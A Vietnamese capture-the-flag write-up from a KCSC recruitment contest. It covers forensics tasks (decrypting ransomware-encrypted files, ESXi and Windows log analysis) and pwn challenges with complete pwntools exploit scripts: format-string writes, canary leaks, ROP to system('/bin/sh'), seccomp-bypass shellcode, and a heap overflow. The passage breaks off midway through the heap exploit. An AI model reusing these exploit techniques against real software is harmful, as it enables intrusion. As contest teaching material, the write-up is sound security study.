Em thấy có file tên là Important.enc nên đã quyết định giải mã nó trước Dùng cyberchef đi ngược lại mấy bước mã hóa ở script là được

Flag
KCSC{S0m3t1m3_R3co\_/ery_1s_EasieR_Th@n_y0u_Thought}

Automatic

Challenge cung cấp cho file Disk.ad1 nên em mở FTK.image
Q1. What is the MITRE ATT&CK sub-technique ID used for persistence?
T1547.001

Đề bài có đề cập đến persistence nên theo kinh nghiệm chơi CTF của em thì em vô folder Startup thì thấy file Recycle Bin.lnk.bat
Recycle Bin.lnk.bat có thể là một shortcut giả mạo được thiết kế để đánh lừa người dùng nhấp vào, sau đó thực thi đoạn mã cụ thể thì nó thực thi script tmp6e5d08.ps1 trong thư mục temp.
Tham khảo: https://attack.mitre.org/techniques/T1547/001/
Q2. What is the MD5 hash of the second stage file executed by the malware?
FCDBBEA5F3DCD22E1E0A5627DAEC0A3A


Xuất file ra và tính hash thôi
Q3. Decrypt any encrypted file to complete this question.
G00d_J0b_Br0!!

Chức năng của script:
Mã hóa tập tin: Script sử dụng thuật toán AES để mã hóa nội dung của các tập tin trong các thư mục mục tiêu (Documents, Downloads, Desktop, Pictures).
Các tập tin đã mã hóa được lưu với phần mở rộng .KCSC, và bản gốc của chúng sẽ bị xóa.
Key: Được tính toán từ tên máy tính ($env:COMPUTERNAME) thông qua thuật toán SHA256. Có thể tìm trong Windows Registry

IV: Được tính toán từ tên người dùng ($env:USERNAME) bằng thuật toán MD5.
Ta có USERNAME là yud-binary trong folder USER luôn rồi
Chú ý đề bài yêu cầu decrypt hết mấy file bị mã hóa, ở đây nếu decrypt hết ta sẽ tìm được hình ảnh mã QR nằm trong folder Pictures.

Flag
KCSC{T1547.001_FCDBBEA5F3DCD22E1E0A5627DAEC0A3A_G00d_J0b_Br0!!}

DFIR 01
Sự cố được giả định tại một Công ty có tên DFCorp có trụ sở tại Việt Nam. Công ty sử dụng các máy chủ, được thiết kế và lắp đặt, kết nối như sau:

Danh sách các dải mạng: DMZ: 192.168.6.0/24 USERLAN: 192.168.17.0/24

Danh sách các thiết bị tham gia hệ thống mạng:

Máy chủ Backup (DMZ): 192.168.6.20 cài đặt Mật khẩu truy cập: Administrator / DFC0rp@sysad

Máy chủ ảo hóa (DMZ): 192.168.6.21 cài đặt VMWare ESXi standalone Mật khẩu truy cập: root / DFC0rp@ESXi

Thiết bị Firewall: 192.168.6.1 sử dụng thiết bị Fortigate 201F Máy chủ Database (DMZ): 192.168.6.24 cài đặt Ubuntu và OracleDB 23ai

Máy chủ Queue (DMZ): 192.168.6.23 cài đặt CentOS và RabbitMQ Các nhân viên tham gia với dải mạng USERLAN

Sự cố xảy ra trên hạ tầng máy chủ chính của DFCorp, chứa nhiều dữ liệu quan trọng của người dùng cũng như các bí mật kinh doanh. Hiện trạng sự cố:

‾ Các máy chủ dịch vụ (DB, Queue) không thể truy cập.

‾ Đội ngũ quản trị đã thử đăng nhập máy chủ ESXi để bật lại VM nhưng không thành công do sai mật khẩu

‾ Khi đăng nhập vào máy chủ backup, hệ thống luôn luôn sử dụng 100% CPU và có dấu hiệu của tấn công mã hóa dữ liệu

Đội ngũ quản trị đã thực hiện cách ly máy chủ ESXi và máy chủ backup sang dải mạng riêng, với vai trò là đội ứng cứu sự cố, hãy hỗ trợ công ty DFCorp điều tra nguyên nhân tấn công và các hành vi kẻ tấn công đã thực hiện được.

Lưu ý: Cách tắt hyper-V để có thể chạy vmesxi:

bcdedit /set hypervisorlaunchtype off

bật hyper-V: bcdedit /set hypervisorlaunchtype auto

Sau khi tắt hoặc bật hyper-V hãy khởi động lại máy chủ

Nếu máy chủ windows gây ra load nhiều cpu hãy set về hostonly hoặc ngắt mạng máy chủ
Nhập ok vào ô flag để mở khóa thử thách tiếp theo sau khi đã đọc xong mô tả, tương tự với các challange sẽ được mở khi hoàn thành challange yêu cầu Có tổng cộng 10 bài

Challenge cung cấp cho ta 1 những file máy ảo sau đây:

Nhấp đúp chuột vào file .ovf VMware sẽ tự động cài đặt (Tùy vào mỗi máy mà có thể sẽ gặp những lỗi riêng).
Đây là kết quả khi khởi động thành công:


DFIR 02

Challenge có nói rằng Đội ngũ quản trị đã thử đăng nhập máy chủ ESXi để bật lại VM nhưng không thành công do sai mật khẩu
Theo 2 bài viết được gợi ý từ hint thì ta cần reset mật khẩu lại để đăng nhập, bản chất là làm sao để xóa đi hash mật khẩu thì ta sẽ không còn mật khẩu nữa và có thể đăng nhập.
Làm theo 2 bài viết từ hint:


Sau khi reset mật khẩu thành công ta có thể quản lý máy chủ thông qua địa chỉ http://192.168.49.128 (qua DHCP).

Để trả lời câu hỏi thì ta xem folder dfcorp-queue:

Flag
KCSC{dfcorp-queue}

DFIR 03

Với câu hỏi này thì em kiểm tra mấy cái log
Tham khảo bài viết này:
https://www.h4tt0r1.cz/post/digital-forensics-and-incident-response-on-vmware-hypervisors

Em dùng các từ khóa phổ biến liên quan đến User-Agent sau đó lọc ra trong log hostd.log
Lọc xong thì em thử submit ai ngờ nó đúng ạ chứ thú thật em cũng không biết sao nó đúng :(((
Flag
KCSC{Mozilla/5.0 (Windows NT 6.3; WOW64; rv:102.0) Gecko/20100101 Goanna/6.7 Firefox/102.0 PaleMoon/33.3.1}

DFIR 04

Câu này thì vẫn là trong hostd.log, em vẫn lọc các từ khóa liên quan đến hành vi rà quét của kẻ tấn công thì không khó để phát hiện được.

Flag
KCSC{2024-08-16}

DFIR 05

Câu này thì xem file Security.evtx lọc các event id 4625 vì đó là sự kiện ghi lại lần đăng nhập thất bại.
Ta dễ dàng thấy trong ngày 16-08-2024 (utc) có rất nhiều lần đăng nhập thất bại, lưu ý là tính trong ngày đó thôi.

Flag
KCSC{10223}

III. Pwn
Cre: kur0x1412
AAA
Phân tích

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setup(argc, argv, envp);
  printf("Input: ");
  gets(buf);
  printf("Your input: %s\n", buf);
  if ( is_admin )
    system("cat /flag");
  return 0;
}


Chỉ có duy nhất hàm main, nhập vào bằng gets() => Buffer Overflow
  

buf ở trước is_admin, nên chỉ cần ghi sao cho tràn được qua is_admin là có flag



KCSC{AAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaa____!!!!!}

Full script
#!/usr/bin/python3
from pwn import *

context.binary = exe = ELF('./main', checksec=False)

if args.REMOTE:
    conn = 'nc 36.50.177.41 50011'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)

p.sendline(b'A'*0x101)

p.interactive()

welcome
Phân tích

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  setup(argc, argv, envp);
  puts("Welcome to KCSC Recruitment !");
  printf("What's your name?\n> ");
  fgets(s, 64, stdin);
  printf("Hi ");
  printf(s);
  if ( key == 0x1337 )
    win();
  return 0;
}


Lỗi Format String ở dòng 10

int win()
{
  return system("/bin/sh");
}


Nếu key = 0x1337 thì sẽ có shell
  

Địa chỉ của key là 0x40408c

Giờ sẽ ghi địa chỉ của key vào buf rồi dùng %n (cụ thể là %hn - ghi 2 byte) để viết 0x1337 vào địa chỉ của key



KCSC{A_little_gift_for_pwner_hehehehehehehehe}

Full script
#!/usr/bin/python3
from pwn import *

context.binary = exe = ELF('./welcome', checksec=False)

if args.REMOTE:
    conn = 'nc 36.50.177.41 50010'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)

key = 0x40408c
payload = f'%{0x1337}c%9$hn'.encode()
payload = payload.ljust(24,b'\0')
payload += p64(key)
p.sendlineafter(b'name?\n> ', payload)

p.interactive()

darktunnel
Phân tích

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  run();
}

void __cdecl __noreturn run()
{
  int v0; // eax
  unsigned __int64 id[3]; // [rsp+0h] [rbp-20h] BYREF
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(_bss_start, 0LL);
  memset(id, 0, 3uLL);
  while ( 1 )
  {
    while ( 1 )
    {
      v0 = menu();
      if ( v0 == 2 )
        break;
      if ( v0 <= 2 )
      {
        if ( !v0 )
          exit(0);
        if ( v0 == 1 )
          input_id(id);
      }
    }
    if ( !id[0] || !id[1] || !id[2] )
    {
      printf("id error !");
      exit(0);
    }
    printf("communication id: ");
    print_id(id);
    printf("communication buffer input start -> ");
    send_buff(id);
  }
}

int __cdecl menu()
{
  int choice; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("1. id setup");
  puts("2. send buffer");
  puts("0. exit");
  printf("> ");
  __isoc99_scanf("%d", &choice);
  return choice;
}


Lựa chọn 1

void __cdecl input_id(unsigned __int64 *id)
{
  int i; // [rsp+1Ch] [rbp-4h]

  memset(id, 0, 3uLL);
  for ( i = 0; i <= 3; ++i )
  {
    printf("id %d: ", i);
    __isoc99_scanf("%lu", &id[i]);
  }
}


Để ý ở nãy hàm run khai báo mảng id với 3 phần tử nhưng vô đây lại nhập 4 => khả năng có lỗi
  

Khi dùng gdb để xem xét thì thấy id sẽ nhập vào 4 vị trí
  

Cái thứ 4 kia chính là canary

Xem lại hàm run thì nếu chọn 2 thì sẽ in 4 id đã nhập vào, nếu có id nào = 0 thì thoát chương trình


void __cdecl print_id(unsigned __int64 *id)
{
  int i; // [rsp+1Ch] [rbp-4h]

  printf("[ ");
  for ( i = 0; i <= 3; ++i )
    printf("%lu ", id[i]);
  puts(" ]");
}


Hàm scanf("%lu", &id[i]), nếu nhập kí tự + hoặc - thì hàm scanf() sẽ coi như không có giá trị nào được nhập vào, do đó id[3] = canary được giữ nguyên -> khi in id sẽ in ra canary

Sau khi in id thì sẽ nhập vào buff


void __cdecl send_buff(unsigned __int64 *id)
{
  int len; // [rsp+18h] [rbp-3F8h]
  int fd; // [rsp+1Ch] [rbp-3F4h]
  char buff[1000]; // [rsp+20h] [rbp-3F0h] BYREF
  unsigned __int64 v4; // [rsp+408h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(buff, 0, sizeof(buff));
  __isoc99_scanf("%s", buff);
  len = strlen(buff);
  if ( len > 1 )
  {
    fd = open("/tmp/data.rc", 577, 644LL);
    write(fd, buff, len);
  }
}


scanf("%s", ...) chỉ dừng nhập khi gặp các byte 0x9, 0x20,0xa, 0xb, 0xc, 0xd => có thể Stack Buffer Overflow, mà ta đã có canary nên có thể điều khiển được saved rip

Sau khi nhập vào sẽ kiểm tra độ dài của đoạn nhập vào bằng strlen(), nếu dài hơn 1 thì sẽ mở file /tmp/data.rc và ghi nội dung file đó vào buff, điều này có thể dẫn đến việc giá trị nhập vào trước đó sẽ bị thay đổi

Tuy nhiên hàm strlen() chỉ kiểm tra đến byte 0x00, vậy nên nếu ở ngay đầu buff ta nhập vào 0x00 thì len = 0




Xem trong ida thì thấy có một hàm ẩn cho shell

void __cdecl admin()
{
  puts("For admin only, contact us if this function suddenly runs: ");
  system("/bin/sh");
}

-> Mục tiêu là ghi đè saved rip của hàm send_buff đè sau đó nhảy vào admin chứ không quay lại hàm run. Vì PIE tắt nên có thể lấy được địa chỉ của hàm admin = 0x4014d3


Trong kiến trúc 64-bit thì khi một hàm được gọi thì giá trị rsp phải luôn được căn chỉnh sao cho chia hết cho 16 (lsb của rsp = 0 chứ không phải 8) vậy nên khi ghi đè saved rip thì sẽ ghi giá trị 0x4014d8, bỏ qua push rbp để không bị dính lỗi


KCSC{c279cb580a741137b9a30096ca3b9706}

Full script
#!/usr/bin/python3
from pwn import *

context.binary = exe = ELF('./main', checksec=False)

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
slan = lambda msg, num: sla(msg, str(num).encode())
san = lambda msg, num: sa(msg, str(num).encode())
sln = lambda num: sl(str(num).encode())
sn = lambda num: s(str(num).encode())
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript=f'''
            # b*0x40135b
            # b*0x4015db
            b*0x4013d4
            c
            ''')

if args.REMOTE:
    conn = 'nc 36.50.177.41 50002'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)
GDB()

admin = 0x4014d3
slan(b'> ', 1)
sla(b'id 0: ', b'1')
sla(b'id 1: ', b'1')
sla(b'id 2: ', b'1')
sla(b'id 3: ', b'+')
slan(b'> ', 2)
ru(b'communication id: [ 1 1 1 ')
canary = int(ru(b'  ]')[:-3])
info('[*] canary: ' + hex(canary))
sleep(1)
payload = b'\0'*0x3e8 + p64(canary) + b'\0'*8 + p64(admin+5)
sl(payload)

p.interactive()

ccrash
Phân tích

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char result[1024]; // [rsp+0h] [rbp-400h] BYREF

  setbuf(stdin, 0LL);
  setbuf(_bss_start, 0LL);
  setup();
  puts("Test::Test: Assertion 'false' failed!");
  puts("Callstack:");
  printf("dbg::handle_assert(214) in mylib.dll %p: Test::Test(9) in mylib.dll\n", result);
  printf("myfunc(10) in TestStackTrace %p: main(23) in TestStackTrace\n", trace);
  puts("invoke_main(65) in TestStackTrace");
  puts("_scrt_common_main_seh(253) in TestStackTrace ");
  puts("OK");
  read(0, result, 0x410uLL);
  return 0;
}


Có thể thấy ngay được ở dòng 10 bài đã cho địa chỉ của mảng result -> có địa chỉ stack

Ở dòng 10, có Stack Buffer Overflow ở hàm read khi có thể vừa đủ ghi đè saved rbp và saved rip

Ngó qua hàm setup()


void __cdecl setup()
{
  scmp_filter_ctx ctx; // [rsp+0h] [rbp-20h]
  size_t page_size; // [rsp+18h] [rbp-8h]
  __int64 savedregs; // [rsp+20h] [rbp+0h] BYREF

  page_size = sysconf(30);
  mprotect((void *)(-(__int64)page_size & (unsigned __int64)&savedregs), page_size, 7);
  ctx = (scmp_filter_ctx)seccomp_init(2147418112LL);
  if ( ctx )
  {
    if ( (int)seccomp_rule_add(ctx, 327681LL, 59LL, 0LL) < 0 || (int)seccomp_rule_add(ctx, 327681LL, 322LL, 0LL) < 0 )
    {
      perror("seccomp_rule_add (execve) failed");
      seccomp_release(ctx);
    }
    else if ( (int)seccomp_rule_add(ctx, 327681LL, 2LL, 0LL) >= 0 )
    {
      if ( (int)seccomp_load(ctx) < 0 )
      {
        perror("seccomp_load failed");
        seccomp_release(ctx);
      }
    }
    else
    {
      perror("seccomp_rule_add (open) failed");
      seccomp_release(ctx);
    }
  }
  else
  {
    perror("seccomp_init failed");
  }
}


Đầu tiên dùng sysconf(30) để lấy giá trị page_size (0x1000)

Sau đó lấy địa chỉ của savedregs để & với -page_size => biến 3 byte thấp nhất của savedregs thành 000 sau đó thay đổi quyền của vùng nhớ vừa tính được ở bên trên thành Read-Write-Excute
  

Mà ở hàm main đã cho địa chỉ stack => nghĩ đến ngay chạy shellcode trên stack

Đoạn code tiếp theo là cơ chế SECCOMP, nó dùng để cấm các syscall không cần thiết để giảm bớt được rủi ro chương trình bị khai thác
  

Vậy là chương trình không thể thực thi các syscall open, execve hay execveat

Tuy nhiên chỉ như vậy là chưa đủ, vẫn còn rất nhiều cách khác để có thể lấy được flag, ở đây mình dùng syscall openat và sendfile

openat(-100, "flag.txt", 0) -> mở file flag.txt

-100 (AT_FDCWD) là để tìm kiếm file trong cùng thư mục với chương trình (Thường thì chall và flag sẽ cùng thư mục)

0 để biểu thị cho việc mở file để đọc

sau khi mở file thành công sẽ trả về một file descriptor trong rax



sendfile(1, fd, 0, 100) -> đọc nội dung từ flag.txt ra stdout

1 là file descriptor của stdout

fd là file descriptor nhận được sau khi mở file thành công

0 là offset, đọc từ đầu file

100 là độ dài nội dung muốn đọc






Khai thác

Để cho nhanh thì mình dùng pwntools để hỗ trợ việc viết shellcode

shellcode = shellcraft.openat(-100, 'flag.txt', 0)
shellcode += shellcraft.sendfile(1, 'rax', 0, 100)


Việc đầu tiên cần làm là phải ghi được shellcode vào vùng stack có thể thực thi
  

Dùng gdb quan sát hàm main thì thấy rằng ở đoạn này sẽ dùng hàm read để ghi vào địa chỉ rbp-0x400 -> đầu tiên sẽ ghi đè:

saved rbp => địa chỉ stack thực thi được + 0x400

saved rip => 0x4014a6



Rồi sau đó ghi shellcode vào và nhảy đến shellcode là có flag



KCSC{_f3_deba3756312c79f925913b50cdd9b9}

Full script
#!/usr/bin/python3
from pwn import *

context.binary = exe = ELF('./main', checksec=False)

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
slan = lambda msg, num: sla(msg, str(num).encode())
san = lambda msg, num: sa(msg, str(num).encode())
sln = lambda num: sl(str(num).encode())
sn = lambda num: s(str(num).encode())
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript=f'''
            b*0x4014c5
            c
            ''')

if args.REMOTE:
    conn = 'nc 36.50.177.41 50001'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)
GDB()

ru(b'mylib.dll ')
stack_leak = int(r(14), 16)
rwx_addr = stack_leak & ~0xfff
info('[*] stack leak: ' + hex(stack_leak))
info('[*] executable address: ' + hex(rwx_addr))

read_in_main = 0x4014a6
payload = b'A'*1024 + p64(rwx_addr+0x400) + p64(read_in_main)
sa(b'OK\n', payload)

shellcode = asm(shellcraft.openat(-100, 'flag.txt', 0))
shellcode += asm(shellcraft.sendfile(1, 'rax', 0, 100))
shellcode = shellcode.ljust(1032, b'\x90') + p64(rwx_addr)
sleep(1)
s(shellcode)

p.interactive()

Chodan
Phân tích

#include 
#include 
#include 
#define __USE_MISC  
#include 
#include 
#define CODE_SIZE 0x100
#define NAME_SIZE 0x10

void (*code)();

void setup()
{
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);

    code = mmap(NULL, CODE_SIZE, PROT_READ | PROT_READ | PROT_EXEC | PROT_WRITE, \
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if(!code)
    {
        perror("Init code failed");
        exit(-1);
    }
}

int main()
{
    setup();
    printf("Your shellcode: ");
    read(0, code, CODE_SIZE);
    close(0);
    uint8_t *cur = (uint8_t*)code + 8;
    while(cur + 8 < code + CODE_SIZE)
    {
        memset(cur, 0, 8);
        cur += 16;
    }
    asm volatile(
        ".intel_syntax noprefix;"
        "mov rax, 0xdededede;"
        "mov rdi, 0xcafebabe;"
        "mov rdx, 0xdcdcdcdc;"
        "mov rbx, 0xaaaaaaaaaa;"
        "mov rcx, 0xcccc;"
        "mov rsi, 0xccacaaaaac;"
        ".att_syntax prefix;"
    );
    code();
    return 0;
}


Hàm setup có tạo vùng nhớ mới và cấp cho quyền Read-Write-Excute

Ở hàm main sẽ cho ta nhâọ vào shellcode

close(0) là đóng stdin -> không thể nhập vào lần nữa -> shell code sẽ là open và sendfile (không execve("/bin/sh\0", 0, 0) vì vẫn cần phải nhập cat /flag)

Tuy nhiên thì code dưới sẽ làm shellcode ta nhập vào để lại 8 byte, xóa 8 byte, để 8 byte, ... liên tiếp như vậy rồi thay đổi giá trị một số thanh ghi và thực thi shellcode => ta cần viết shellcode sao cho đoạn cần thực thi không bị xóa, chia nhiều đoạn nhỏ và sẽ nối với nhau bằng lệnh jmp/jne/je...



Trang web hỗ trợ tính toán độ dài shellcode: https://defuse.ca/online-x86-assembler.htm#disassembly
KCSC{YeJEonChEOReOm_YEOpEsE0_BaP_MEOgEOdO_Uy30nhI_NuNI_5@ljj@k_m@JuCHyEOdo}

Shellcode
# /flag = 0x67616c662f
shellcode = asm('''
mov esi, 0x67
    ''', arch='amd64') + b'\x74\x09' + b'\x90'*9

shellcode += asm('''
shl rsi, 32
    ''', arch='amd64') + b'\x75\x0a' + b'\x90'*10

shellcode += asm('''
mov edi, 0x616c662f
    ''', arch='amd64') + b'\x75\x09' + b'\x90'*9

shellcode += asm('''
xor rsi, rdi
push rsi
push rsp
pop rdi
    ''', arch='amd64') + b'\x75\x08' + b'\x90'*8

shellcode += asm('''
xor rsi, rsi
push rsi
pop rdx
    ''', arch='amd64') + b'\x74\x09' + b'\x90'*9

shellcode += asm('''
mov al, 0x2
syscall
push rax
pop rsi
    ''', arch='amd64') + b'\x74\x08' + b'\x90'*8

shellcode += asm('''
push rax
pop rdi
inc rdi
    ''', arch='amd64') + b'\x75\x09' + b'\x90'*9

shellcode += asm('''
mov al, 0x28
mov r10b, 0xff
syscall
    ''', arch='amd64') + b'\x75\x08' + b'\x90'*8


mình viết các lệnh jump (0x75/0x74) bằng pwntools thì bị lỗi nên viết trực tiếp các byte luôn

babyROP
Phân tích

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  setup(argc, argv, envp);
  puts("Welcome to KCSC Recruitment !!!");
  printf("Data: ");
  fgets(s, 4919, stdin);
  if ( strlen(s) > 0x40 )
  {
    puts("Buffer overflow ??? No way.");
    exit(0);
  }
  puts("Thank for playing :)");
  return 0;
}


Ở đây có lỗi Stack Buffer Overflow ở hàm fgets

Vậy chỉ cần ROP để leak libc rồi thực thi system("/bin/sh")

Giá trị các thanh ghi khi ret

Tuy nhiên thì khi mình tìm gadget thì không cài nào dùng được :((

Sau một hồi bế tắc thì mình quyết định ngồi gdb xem từng dòng code thì phát hiện ra một điều thú vị

Sau khi hàm printf() được gọi thì sẽ để lại một con trỏ trỏ đến địa chỉ libc trong rdi -> dùng puts để leak libc -> quay lại main lần nữa để ROP lấy shell



KCSC{GOToverwrite_is_Amazing_eab60643273379b005464b6ec048a6d4}
Vậy còn một cách nữa là GOToverwrite

Full script
#!/usr/bin/python3
from pwn import *

context.binary = exe = ELF('./chall_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
ld = ELF('./ld-linux-x86-64.so.2', checksec=False)

info = lambda msg: log.info(msg)
sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
slan = lambda msg, num: sla(msg, str(num).encode())
san = lambda msg, num: sa(msg, str(num).encode())
sln = lambda num: sl(str(num).encode())
sn = lambda num: s(str(num).encode())
r = lambda nbytes: p.recv(nbytes)
ru = lambda data: p.recvuntil(data)
rl = lambda : p.recvline()

def GDB():
    if not args.REMOTE:
        gdb.attach(p, gdbscript=f'''
            b*0x4012cb
            c
            ''')

if args.REMOTE:
    conn = 'nc 36.50.177.41 50003'.split()
    p = remote(conn[1], int(conn[2]))
else:
    p = process(exe.path)
GDB()

ret = 0x40101a
# ret để không bị dính lỗi căn chỉnh stack
payload = b'\0'*0x48 + p64(ret) + p64(exe.plt.printf)
payload += p64(exe.plt.puts) + p64(exe.sym.main)
sla(b'Data: ', payload)

ru(b'Thank for playing :)\n')
libc_leak = u64(r(6) + b'\0\0')
libc.address = libc_leak - 0x62050
info('[*] libc leak: ' + hex(libc_leak))
info('[*] libc base: ' + hex(libc.address))

pop_rdi = libc.address + 0x2a3e5
payload = b'\0'*0x48 + p64(ret) + p64(pop_rdi) + p64(next(libc.search(b'/bin/sh\0'))) + p64(libc.sym.system)
sla(b'Data: ', payload)

p.interactive()

LapTrinhCanBan
Phân tích

#include
#include
#include
void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}
struct sinhVien {
    char *name;
    unsigned int age;
    float score;
    struct sinhVien *next;
};
typedef struct sinhVien sinhVien;
int my_read(char buf[],unsigned int size){
    int len ,i ;
    len = read(0,buf,size) ;
    for(i =0 ;iif(buf[i]=='\n'){
            buf[i] = NULL ;
        }
    }
    return len ;
}
void menu() {
    puts("1. Add student");
    puts("2. Print student");
    puts("3. Delete student");
    puts("4. Exit");
    printf("> ");
}

sinhVien *makeSV() {
    sinhVien *newSV = (sinhVien*)malloc(sizeof(sinhVien));
    unsigned int size ;
    printf("Size name: ");
    scanf("%u",&size) ;
    newSV->name = malloc(size);
    printf("Name: ");
    my_read(newSV->name,0x1337);
    printf("Age: ");
    scanf("%u", &newSV->age);
    printf("Score: ");
    scanf("%f", &newSV->score);
    getchar();
    newSV->next = NULL;
    return newSV;
}

void add(sinhVien** top) {
    sinhVien* newnode = makeSV();
    if (*top == NULL) {
        *top = newnode;
    } else {
        sinhVien* tmp = *top;
        while (tmp->next != NULL) {
            tmp = tmp->next;
        }
        tmp->next = newnode;
    }
}

void show(sinhVien* top) {
    unsigned int idx = 0;
    puts("$$$$$ KCSC SCORE $$$$$");
    while (top != NULL) {
        printf("ID: %d\nNAME: %s\nAGE: %d\nSCORE: %.2f\n\n", idx, top->name, top->age, top->score);
        top = top->next;
        idx++;
    }
    puts("$$$$$$$$$$$$$$$$$$$$$$");
}

void delete(sinhVien **head, unsigned int idx) {
    if (*head == NULL) {
        printf("List is empty. Cannot delete.\n");
        return;
    }
    sinhVien *temp = *head;
    if (idx == 0) {
        *head = temp->next; 
        free(temp->name);
        free(temp);
        printf("Successfull.\n");
        return;
    }
    sinhVien *prev = NULL;
    for (unsigned int i = 0; i < idx; i++) {
        if (temp == NULL) {
            printf("Invalid index.\n");
            return;
        }
        prev = temp;
        temp = temp->next;
    }
    if (temp == NULL) {
        printf("Invalid index.\n");
        return;
    }
    prev->next = temp->next;
    free(temp->name);
    free(temp);
    printf("Successfull.\n");
}

int main() {
    setup();
    puts("Welcome to KCSC Score !!!");
    sinhVien *head = NULL;
    unsigned int choice;
    while (1) {
        menu();
        scanf("%u", &choice);
        getchar(); 
        switch (choice) {
            case 1:
                add(&head);
                break;
            case 2:
                show(head);
                break;
            case 3:
                printf("Index: ");
                scanf("%u", &choice);
                getchar(); 
                delete(&head,choice);
                break;
            case 4:
                exit(0);
            default:
                puts("Invalid choice.");
                break;
        }
    }
}


Có lỗi Heap Buffer Overflow ở dòng 41. Trước đó mình nhập size cho name để cấp phát một vùng nhớ nhưng lại luôn nhập vào 0x1337 byte

Leak

đĐầu tiên mình sẽ tạo 2 sinhvien như sau

add(0x10, b'\x11'*8, 1, 1)
add(0x10, b'\x22'*8, 1, 1)

#sv0
0x1780b290:     0x0                  0x21
0x1780b2a0:     0x1780b2c0           0x3f80000000000001
0x1780b2b0:     0x0                  0x21
0x1780b2c0:     0x1111111111111111   0x0
#sv1
0x1780b2c0:     0x0                  0x21
0x1780b2e0:     0x1780b300           0x3f80000000000001
0x1780b2f0:     0x0                  0x21
0x1780b300:     0x2222222222222222   0x0


Sau đó xóa sv1 đi

#sv0
0x1780b290:     0x0                  0x21
0x1780b2a0:     0x1780b2c0           0x3f80000000000001
0x1780b2b0:     0x0                  0x21
0x1780b2c0:     0x1111111111111111   0x0

0x1780b2d0:     0x0                  0x21
0x1780b2e0:     0x1781cb0b           0xbc70b1f1aac74486
0x1780b2f0:     0x0                  0x21
0x1780b300:     0x1780b              0xbc70b1f1aac74486


Tại địa chỉ 0x1780b2e0 là địa chỉ của heap nhưng đã bị encrypt do cơ chế bảo vệ xor fd khi free vào tcache (do chall ở bản glibc 2.35)

Tuy nhiên vẫn có cách giải mã, có thể đọc thêm trên how2heap

Ở hàm show thì dùng printf("%s", ...) (in đến khi gặp NULL) để in ra tên sinh viên, mà đọc vào name thì dùng hàm read (không thêm NULL vào cuối chuỗi) nên ở đây mình sẽ xóa sv0 đi vào tạo lại rồi thêm name sao cho nối ngay đến địa chỉ 0x1780b2e0 để leak heap


delete(0)
add(0x10, b'\x33'*0x20, 1, 1)
show()
ru(b'\x33'*0x20)
heap_base = decrypt(u64(r(4) + b'\0\0\0\0')) & ~0xfff
info('[*] heap base: ' + hex(heap_base))

#sv0
0x1780b290:     0x0                     0x21
0x1780b2a0:     0x1780b2c0              0x3f80000000000001
0x1780b2b0:     0x0                     0x21
0x1780b2c0:     0x3333333333333333      0x3333333333333333

0x1780b2d0:     0x3333333333333333      0x3333333333333333
0x1780b2e0:     0x1781cb0b              0xbc70b1f1aac74486
0x1780b2f0:     0x0                     0x21
0x1780b300:     0x1780b                 0xbc70b1f1aac74486


Sau đó sửa lại về ban đầu và tạo lại sv1

delete(0)
add(0x10, b'\x33'*0x18 + p64(0x21), 1, 1)
add(0x10, b'\x22'*8, 1, 1)


Tiếp đến mình sẽ tạo một chunk để free vào unsorted bin để leak libc

Cần phải tạo một chunk ngay sau để chunk lớn khi free không gộp vào topchunk. Mình sẽ free luôn chunk này đi để tăng count trong tcache_per_thread để lát dùng malloc địa chỉ tùy ý


add(0x500, b'\x44'*8, 1, 1)
add(0x30, b'\x55'*8, 1, 1)
delete(3)
delete(2)

#sv2 (đã free)
0x1780b310:     0x0                             0x21
0x1780b320:     0x1781c05b                      0xbc70b1f1aac74486
0x1780b330:     0x0                             0x511
0x1780b340:     0x7fae55c1ace0 96>  0x7fae55c1ace0 96>
...


Tiếp đến mình dùng sv0 overflow để sửa con trỏ name của sv1 để cho nó trỏ đến 0x1780b340 -> leak libc

delete(0)
add(0x10, b'\x33'*0x18+p64(0x21)+b'\x40', 1, 1)
show()
ru(b'ID: 0\nNAME: ')
libc_leak = u64(r(6) + b'\0\0')
libc.address = libc_leak - 0x21ace0
info('[*] libc base: ' + hex(libc.address))


Lưu ý sau đoạn này sv1 là sv0 còn sv0 là sv1

#sv1
0x1780b290:     0x0                             0x21
0x1780b2a0:     0x1780b2c0                      0x3f80000000000001
0x1780b2b0:     0x0                             0x21
